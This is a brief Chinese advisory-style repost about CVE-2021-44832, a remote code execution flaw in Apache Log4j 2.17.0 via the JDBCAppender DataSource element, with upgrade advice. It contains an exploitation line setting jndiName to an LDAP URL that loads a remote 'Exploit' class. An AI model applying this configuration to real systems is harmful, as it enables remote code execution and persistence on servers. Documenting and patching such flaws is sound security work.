漏洞信息:CVE-2021-44832-apache-log4j-2-17-0 RCE
2021-12-29 11:2:11 Author: mp.weixin.qq.com(查看原文) 阅读量:1 收藏
2021-12-29 11:2:11 Author: mp.weixin.qq.com(查看原文) 阅读量:1 收藏
0x01 前言
2021 年 12 月 28 日,有安全人员发布了关于 CVE-2021-44832 – APACHE LOG4J 2.17.0 的信息。
0x02 漏洞利用
<?xml version="1.0" encoding="UTF-8"?><Configuration status="error"><Appenders><JDBC name="databaseAppender" tableName="dbo.application_log"><DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" /><Column ...</JDBC></Appenders>…</Configuration>
把 DataSource 标签的内容更改为:
<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>即可触发payload。
图解:
验证视频:
0x03 修复建议
将 Apache Log4j2 升级到 2.17.1、2.12.4 和 2.3.2 或更高版本。此漏洞利用门槛较高,得先拥有远程访问服务器和更改配置的权限;目前来看,其可作为权限维持的选项之一。
原文链接:https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
文章来源: https://mp.weixin.qq.com/s?__biz=Mzg5MzU4NTgwNQ==&mid=2247484921&idx=1&sn=ae6e04ff5cd2961cb78a743536b8bcee&chksm=c02dd51bf75a5c0dff513d7b17fb1b1426601486f04ba8dc515dedfb416e478985395dfc6923&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh